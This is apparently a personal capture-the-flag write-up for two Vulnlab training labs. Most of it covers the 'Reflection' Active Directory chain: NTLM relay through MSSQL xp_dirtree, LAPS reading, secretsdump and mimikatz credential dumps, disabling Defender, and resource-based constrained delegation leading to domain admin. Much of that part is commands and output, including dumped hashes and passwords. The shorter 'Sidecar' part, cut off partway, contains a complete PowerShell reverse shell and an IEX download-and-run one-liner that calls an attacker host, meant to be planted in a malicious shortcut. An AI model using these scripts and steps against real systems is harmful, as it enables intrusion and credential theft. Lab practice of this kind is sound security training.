vulnlab-reflection

vulnlab-reflection

Reflection is a medium Active Directory chain which consists of three machines, MS01, WS01 and DC01 , from MS01, MSSQL staging credentials were found from smb share, which lead to relaying the NTLM hash on DC01’s smb shares, where the service account had access to the prod share containing credentials for production database, from where we’ll get two domain credentials, abbie.smith having GenericAll on MS01 through which can read the LAPS password and further dumping the Georgia.Price password from credential vault, this user also had GenericAll on WS01, having the full access on MS01, we can perform Resource Based Constrained Delegation (RBCD) and again from dumping we’ll get Rhys.Garner ‘s password, whose password we can reuse on DOM_RGARNER who is a part of domain admin.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

mssql enum

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

john svc_web_staging.hash –wordlist=/usr/share/wordlists/rockyou.txt  -> uncrackable

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []

Next we do a NTLMrelay attack to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.203.133 -i
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.10.203.134, attacking target smb://10.10.203.133
[*] Authenticating against smb://10.10.203.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-11 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-12 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!
[*] SMBD-Thread-13 (process_request_thread): Connection from 10.10.203.134 controlled, but there are no more targets left!

We trigger it from our sqlshell

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

and in another terminal window on my kali box

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ nc 127.0.0.1 11000                     
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# use prod
# ls
drw-rw-rw-          0  Wed Jun  7 19:44:26 2023 .
drw-rw-rw-          0  Wed Jun  7 19:43:22 2023 ..
-rw-rw-rw-         45  Thu Jun  8 13:24:39 2023 prod_db.conf
# get prod_db.conf
# 

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat prod_db.conf 
user=web_prod
password=Tr<redacted>01
db=prod

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec mssql dc01.reflection.vl -u names.txt -p 'Tr<redacted>01' --local-auth --continue-on-success
MSSQL       dc01.reflection.vl 1433   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:DC01)
MSSQL       dc01.reflection.vl 1433   DC01             [+] web_prod:Tribesman201 
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'web_staging'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Administrator'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'Guest'.
MSSQL       dc01.reflection.vl 1433   DC01             [-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user ''.

sqsh to dc01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ sqsh -S 10.10.203.133 -U 'web_prod' -P 'Tr<redacted>01'

sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> use prod;
2> go
1> select * from users;
2> go -m vert
id:       1
name:     abbie.smith
password: CM<redacted>Ew
 
id:       2
name:     dorothy.rose
password: hC<redacted>SJ
 
(2 rows affected)

ldap search

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ ldapsearch -H ldap://dc01.reflection.vl -U abbie.smith -w 'CM<redacted>Ew' -b 'DC=reflection,DC=vl' "(objectClass=user)" "*" | grep sAMAccountName | cut -d " " -f 2 > domainUsers.txt
SASL/DIGEST-MD5 authentication started
SASL username: abbie.smith
SASL SSF: 128
SASL data security layer installed.

bloodhound

bloodhound-python -d reflection.vl -c all -u 'abbie.smith' -p 'CM<redacted>Ew' -ns 10.10.203.133 --dns-tcp

check machine quota

──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "dorothy.rose" -p "hC<redacted>SJ" -M maq
SMB         dc01.reflection.vl 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        dc01.reflection.vl 389    DC01             [+] reflection.vl\dorothy.rose:hC_fny3OK9glSJ 
MAQ         dc01.reflection.vl 389    DC01             [*] Getting the MachineAccountQuota
MAQ         dc01.reflection.vl 389    DC01             MachineAccountQuota: 0

check LAPS

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec ldap dc01.reflection.vl -u "abbie.smith" -p "CM<redacted>Ew" -M laps 
SMB         DC01            445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
LDAP        DC01            389    DC01             [+] reflection.vl\abbie.smith:CMe1x+nlRaaWEw 
LAPS        DC01            389    DC01             [*] Getting LAPS Passwords
LAPS        DC01            389    DC01             Computer: MS01$                Password: H44<redacted>}xi

check pasword used users on ws01.reflection.vl

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ws01.reflection.vl -u domainUsers.txt -p "H447<redacted>}xi" --continue-on-success --local-auth
SMB         ws01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         ws01.reflection.vl 445    MS01             [+] MS01\Administrator:H4<redacted>xi (Pwn3d!)
SMB         ws01.reflection.vl 445    MS01             [-] MS01\Guest:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [-] MS01\labadm:H4*xi STATUS_LOGON_FAILURE 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\DC01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\krbtgt:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\MS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] MS01\WS01$:H4*xi 
SMB         ws01.reflection.vl 445    MS01             [+] 

Do a secretsdump

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump 'ms01/administrator:H4<redacted>xi@ws01.reflection.vl' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:38<redacted>9a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-18 08:18:23)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:f8f1905251e52be2e3c280efa37d6595579baa14e7e22dcdc776e76cc08fbf72
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:b5572db5a79c069d564c0da3a7543ea0
REFLECTION\MS01$:des-cbc-md5:04340497ef8c2a31
REFLECTION\MS01$:plain_password_hex:58dc1407b76528658a71020f1bf3d26064f983ffb68ceaf6bf9781a33691791f5bb668717a5f094f71569c6b7ec629d2de911675b1d9105ebfb4fc23685385d364c0314354dadf9ed521b11413d19736edde2de06ab91c18032498f613bafa4be0dda4e394e0af1c9fca8210462ab2108331bfdfe3995f1812bc0973e63da4e3487260b5dd118ef0289e952c94b60687858a13dd81a5316984af040d66409529b44c1bf0873747f2a27ee115eba71811d33b1bdd12fcf8978ae91239e9b22c026aac009f81f5bdd44a7fb9e491af455014bf4e99cd9cc0ddab2eb5bf243eb6f578e62eb542fb9751907a6bf581d535dc
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:076ebd94d605cdbf46f0bae7f55d62dc:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

We use the admin account to RDP to the Box and start enumerating it

xfreerdp /f /u:administrator /p:'H44<redacted>}xi' /v:ms01.reflection.vl /cert:ignore /rfx 

on MS01 disable defender upload mimikatz.exe , we find :
Georgia.Price
DBl<redacted>id

RBCD attack op ws01.reflection.com ( via ms01 )

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@ms01.reflection.vl  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password: H44<redacted>xi

[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3819a8ecec5fd33f6ecb83253b24309a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/svc_web_staging:$DCC2$10240#svc_web_staging#6123c7b97697564e016b797de99025dd: (2023-06-07 19:08:01)
REFLECTION.VL/Administrator:$DCC2$10240#Administrator#10c8403d0d68c47754170bf825ffbe9d: (2023-06-07 19:11:08)
REFLECTION.VL/Georgia.Price:$DCC2$10240#Georgia.Price#f20a83b9452ce1c17cf4a57c2b05f7ec: (2024-07-19 09:43:54)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\MS01$:aes256-cts-hmac-sha1-96:dd7df26c646dc3eab4947b81af5700127a622d4480bf217755f9b9b072f6aa1d
REFLECTION\MS01$:aes128-cts-hmac-sha1-96:c400497cd92b4b41c6a00b44f287830b
REFLECTION\MS01$:des-cbc-md5:7943755b4f326449
REFLECTION\MS01$:plain_password_hex:37e2dea970915b066f2d2b35806a0f22d10e6335a1fbee73db06f02d679b2dca0ad0a9cf9583bac1f56594df8af7494eba5c7609ddd0ac303af48b4a585f7a618b4596f241b70142d18fa970a0678ff066d41cb3ff4ee3cedf81083c64b2c1925a28fb39fd0d87172f8ae1c86fa23ab6d26068c0ace2cc2a566dae4c1581515af8c7273f5bd181eec8de2f9db0f06a8a2c4f6395d30b5e3872cde5fc21cbc0213bb59f241a3fb3bff601de5cbe893192f64310a564497307f12935a316340625e74441f689489c17fe9e6550426b27890830a261edec4a5005652878a2e47830eec7e5bb5b42772438e100f7f935d755
REFLECTION\MS01$:aad3b435b51404eeaad3b435b51404ee:c1658a71853a7f23f7ff13cd1c7ee10a:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb7ad02ee5577322cc2a2e096b7bab17101a4f9a7
dpapi_userkey:0x9de553e3a73ece7cff322d722fc9fbdfe4fd78cc
[*] NL$KM 
 0000   C0 BE 31 EA 49 A4 51 79  67 62 D2 F1 C2 22 1C BE   ..1.I.Qygb..."..
 0010   CE 86 94 CF D5 32 5D 73  32 64 85 4C 37 81 7B AE   .....2]s2d.L7.{.
 0020   0C D1 61 83 A3 65 91 58  D6 F0 B3 17 47 5F 64 93   ..a..e.X....G_d.
 0030   A4 AC D7 4F E7 E4 A5 EE  E8 6D BE 93 7A CF 35 77   ...O.....m..z.5w
NL$KM:c0be31ea49a451796762d2f1c2221cbece8694cfd5325d733264854c37817bae0cd16183a3659158d6f0b317475f6493a4acd74fe7e4a5eee86dbe937acf3577
[*] _SC_MSSQL$SQLEXPRESS 
REFLECTION\svc_web_staging:DivinelyPacifism98
[*] Cleaning up... 

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -delegate-to 'ws01$' -dc-ip dc01.reflection.vl -action 'read' reflection.nl/Georgia.Price:'DB<redacted>id'


Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-rbcd -action write -delegate-to "WS01$" -delegate-from "MS01$" -dc-ip 10.10.243.69 "Reflection/Georgia.Price:DB<redacted>id" 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     MS01$        (S-1-5-21-3375389138-1770791787-1490854311-1104)

then

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-getST -spn 'cifs/WS01.reflection.vl' -impersonate Administrator -dc-ip 10.10.243.69 'Reflection/MS01$' -hashes ':c1658a71853a7f23f7ff13cd1c7ee10a'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ export KRB5CCNAME=Administrator@cifs_WS01.reflection.vl@REFLECTION.VL.ccache  

and a secretsdump to ws01.reflection.com

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-secretsdump administrator@WS01.reflection.vl -k -no-pass 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a2<redacted>02:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
[*] Dumping cached domain logon information (domain/username:hash)
REFLECTION.VL/Rhys.Garner:$DCC2$10240#Rhys.Garner#99152b74dac4cc4b9763240eaa4c0e3d: (2023-06-08 11:17:05)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
REFLECTION\WS01$:plain_password_hex:55005c003f00240038003f0036005b004800350078006e007a0056003a004d003600490038003d0042005b005200340067006f006c003000580060007a00430045002600590021004e00780021004800380064004000260046005d0057007a005e005b006600320073002000380076005800310026006e0078006d002a007800530059006400670075002a002800730036003f0062006200240069005b004a005d006e0021006d0020004f0060003e0061006b002600360045004b007300320075006100390069002b007300290062005e0027006c0042004a005c005500600066002f003e002200430041003b004800
REFLECTION\WS01$:aad3b435b51404eeaad3b435b51404ee:b7728f2d275eb4ff1f6e30692b16c7a1:::
[*] DefaultPassword 
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xe7b434bbb2fe36946ecafdfab07d4396c039c6e8
dpapi_userkey:0xf772db3cfa86d2d96caf0fc57946c6e7c17511eb
[*] NL$KM 
 0000   DE AA F4 50 81 29 7C 82  0D 6F F2 2D 08 8B A2 7A   ...P.)|..o.-...z
 0010   7D 46 9F 66 C3 8F D4 9A  FA DB D2 9D 56 9A 79 28   }F.f........V.y(
 0020   10 1F 8F 40 B4 EB 04 6F  42 8F 37 02 7E E5 85 93   ...@...oB.7.~...
 0030   00 9C 28 46 DE 39 3F BB  78 90 E7 C8 AB 3A 75 D1   ..(F.9?.x....:u.
NL$KM:deaaf45081297c820d6ff22d088ba27a7d469f66c38fd49afadbd29d569a7928101f8f40b4eb046f428f37027ee58593009c2846de393fbb7890e7c8ab3a75d1
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "whoami"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \yVNLerVO
[*] Running task \yVNLerVO
[*] Deleting task \yVNLerVO
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
[*] Attempting to read ADMIN$\Temp\yVNLerVO.tmp
nt authority\system

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-atexec administrator@WS01.reflection.vl 'powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"' -hashes 'aad3b435b51404eeaad3b435b51404ee:a2<redacted>02'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] This will work ONLY on Windows >= Vista
[*] Creating task \AvHKoFmN
[*] Running task \AvHKoFmN
[*] Deleting task \AvHKoFmN
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp
[*] Attempting to read ADMIN$\Temp\AvHKoFmN.tmp

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-psexec administrator@WS01.reflection.vl -hashes ':a2<redacted>02' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on WS01.reflection.vl.....
[*] Found writable share ADMIN$
[*] Uploading file YQydtkPz.exe
[*] Opening SVCManager on WS01.reflection.vl.....
[*] Creating service dvqZ on WS01.reflection.vl.....
[*] Starting service dvqZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>    

--
c:\Users\Rhys.Garner\Desktop> type flag.txt
VL{ba<redacted>eb}

.

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ evil-winrm --ip dc01.reflection.vl -u 'dom_rgarner' -p 'kn<redacted>uP'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dom_rgarner\Documents> dir
*Evil-WinRM* PS C:\Users\administrator\desktop> dir


    Directory: C:\Users\administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/8/2023   4:24 AM             36 flag.txt


*Evil-WinRM* PS C:\Users\administrator\desktop> type flag.txt
VL{05<redacted>17}
*Evil-WinRM* PS C:\Users\administrator\desktop> 

That’s all.

 

 

vulnlab-sidecar

vulnab-sidecar

a very hard Windows machine

Preparing the Shellcode

┌──(puck㉿kali)-[~/vulnlab/sidecar]
└─$ cat puckshell.txt
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

 

Create a malicious link on a Windows pc

i used

powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://10.8.2.138/puckshell.txt')))

 

Uploading the malicious link file

└─$ smbclient //DC01.sidecar.vl/Public

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> shares
shares: command not found
smb: \> ls
  .                                   D        0  Sun Dec 10 15:29:38 2023
  ..                                DHS        0  Sun Dec 10 15:20:57 2023
  Backup                              D        0  Sun Dec 10 15:29:37 2023
  Common                              D        0  Sun Dec 17 12:09:03 2023
  Install                             D        0  Sun Dec 10 15:51:08 2023
  Transfer                            D        0  Sun Dec 10 15:29:32 2023

        6291455 blocks of size 4096. 2227213 blocks available
smb: \> cd Common
smb: \Common\> ls
  .                                   D        0  Sun Dec 17 12:09:03 2023
  ..                                  D        0  Sun Dec 10 15:29:38 2023
  Common.lnk                          A     1741  Sun Dec 10 15:47:04 2023
  Custom                              D        0  Sun Dec 17 12:14:14 2023
  Install.lnk                         A     1666  Sun Dec 10 15:47:05 2023
  Transfer.lnk                        A     1681  Sun Dec 10 15:47:05 2023

        6291455 blocks of size 4096. 2227210 blocks available
